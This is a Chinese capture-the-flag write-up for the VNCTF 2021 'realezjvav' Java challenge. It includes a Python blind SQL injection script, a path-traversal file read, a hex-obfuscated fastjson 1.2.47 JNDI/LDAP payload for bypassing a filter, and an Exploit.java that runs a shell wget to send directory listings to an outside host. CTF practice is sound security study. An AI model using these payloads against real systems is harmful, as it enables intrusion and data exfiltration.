[VNCTF 2021]realezjvav

张 渗透技巧 4年前
6.55W 0
华盟原创文章投稿奖励计划

文章来源:EDI安全

java题 开局个登陆框 sql注入?

测得在password位置有注入 一个单引号500。

[VNCTF 2021]realezjvav

两个单引号正常

[VNCTF 2021]realezjvav

fuzz一下 发现过滤的并不多 但是延时函数过滤了 并且貌似不能布尔盲注 搜了下 可以笛卡尔积盲注。

[VNCTF 2021]realezjvav

脚本: 

import requests
url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=''
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:
        mid=(top+low)//2
        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)
        data1={'username':'admin','password':p1}
        data2={'username':'admin','password':p2}
        try:
            print(i,mid)
            r1=requests.post(url,data=data1,timeout=1)
        except requests.exceptions.ReadTimeout as e:
            flag+=chr(mid)
            print(flag)
            break
        except Exception as e:
            pass
        else:
            try:
                r2=requests.post(url,data=data2,timeout=1)
            except requests.exceptions.ReadTimeout as e:
                low=mid+1
            except Exception as e:
                pass
            else:
                top=mid-1
    if flag==f1:
        break
# user
# id,username,password
# no_0ne_kn0w_th1s

注:超时时间要自己测下 有时候比较大 有时候比较小 可能跑的人太多了吧

登陆之后发现

[VNCTF 2021]realezjvav

测了下可以目录穿越 任意文件读取 读pom.xml

[VNCTF 2021]realezjvav

刚好是有漏洞的版本 并且创建角色的时候刚好是json字符串

参考:https://github.com/CaijiOrz/fastjson-1.2.47-RCE

打一下payload 发现被拦了

[VNCTF 2021]realezjvav

前两天刚好在p神的星球看到

[VNCTF 2021]realezjvav

刚好可以绕过 修改后的payload: 

roleJson={"name":{"x40x74x79x70x65":"java.lang.Class","val":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c"},"x":{"x40x74x79x70x65":"x63x6fx6dx2ex73x75x6ex2ex72x6fx77x73x65x74x2ex4ax64x62x63x52x6fx77x53x65x74x49x6dx70x6c","dataSourceName":"ldap://1.1.1.1:1389/Exploit","x61x75x74x6fx43x6fx6dx6dx69x74":true}}

貌似没bash 用dnslog带出来的flag 具体流程参见那篇文章就行了 Exploit.java: 

public class Exploit{
    public Exploit(){
        try{
            Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","wget http://1.1.1.1:900/?a=$(ls /|base64 -w0"});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

[VNCTF 2021]realezjvav

VNCTF 2021(1),realezjvav(1)
本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/277161.html
张官方

1.49K篇文章 69.64M总阅读量

相关文章

发表评论